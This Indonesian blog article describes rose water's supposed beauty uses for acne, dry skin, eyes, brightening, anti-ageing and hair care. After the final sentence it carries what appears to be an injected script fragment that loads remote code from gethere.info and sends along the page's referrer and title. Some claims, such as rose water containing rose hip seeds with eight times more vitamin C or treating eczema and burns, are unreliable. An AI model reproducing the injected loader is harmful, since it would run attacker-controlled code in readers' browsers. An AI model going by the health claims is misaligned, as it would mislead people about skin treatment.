Manfaat Air Mawar Untuk Kecantikan

air mawar

Air mawar adalah salah satu bahan untuk mempercantik diri yang sudah sangat sering digunakan. Hal itu karena air mawar mempunyai banyak khasiat yang sudah tidak diragukan lagi. Air mawar dapat mengatasi masalah kecantikan seperti jerawat, penuaan dini, dan bahkan bisa untuk mempersehat rambut. Dalam artikel ini, evoucher akan membahas manfaat air mawar untuk kecantikan. Bukan hanya itu, evoucher juga akan membahas tentang cara penggunaan air mawar tersebut. Ayo simak !

Air mawar dapat merawat kulit berjerawat

Air mawar bisa dijadikan antiseptik dalam merawat wajah anda yang mempunyai jerawat. Karena kita tahu jika sedang jerawat, kulit wajah kita kadang mengalami peradangan. Cairan air mawar ini dapat menghilangkan kemerahan pada wajah serta membersihkan pori-pori yang tersumbat. Caranya anda bisa mencuci muka dengan air mawar secara rutin dalam sehari 2 kali saja.

Air mawar dapat merawat kulit kering dan sensitif

Air mawar juga dapat memberikan lapisan yang melembabkan pada kulit. Tentunya  cocok bagi Anda yang memiliki kulit kering dan sensitif. serta juga dapat mengatasi eczema, dermatitis, lecet dan luka bakar. Gunakan air mawar seperti menggunakan toner pada saat yang diperlukan.

Menyegarkan Mata

Bagi Anda yang mempunyai segudang rutinitas yang membuat Anda jarang tidur sehingga mata Anda menjadi tidak indah, maka air mawar ini bisa dijadikan solusi untuk membuat mata Anda indah kembali. Caranya dengan mengkompres air mawar dengan kapas yang dicelupkan kemudian tempelkan pada area mata panda.

Mencerahkan Wajah

Manfaat air mawar untuk mencerahkan wajah, Air mawar kaya akan vitamin A dan E yang dapat membuat wajah lebih cerah dan segar. Air mawar dengan suhu yang dingin bisa membantu membuat kulit Anda nampak cerah dan segar dengan cara celupkan kapas dan tepuk-tepuk di kulit.

Mencegah Penuaan Dini

Air mawar mengandung Rose Hip Seeds yang memiliki 8 kali vitamin C lebih banyak sehingga bisa mencegah kerutan yang dapat menyebabkan penuaan dini.

Merawat Rambut

Selain untuk kulit, air mawar bermanfaat juga untuk rambut. Air mawar dapat membersihkan rambut yang kotor, berketombe, dan menjaga agar rambut tetap sehat. Caranya Mix air mawar dan air, dalam jumlah yang sama, dan pijat dan campurkan ke rambut. Biarkan selama sekitar sepuluh sampai 15 menit, kemudian sampo dan bilas seperti biasa.

Sudah tahu kan cara manfaat air mawar dan cara penggunaannya? Semoga bermanfaat ya !!s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;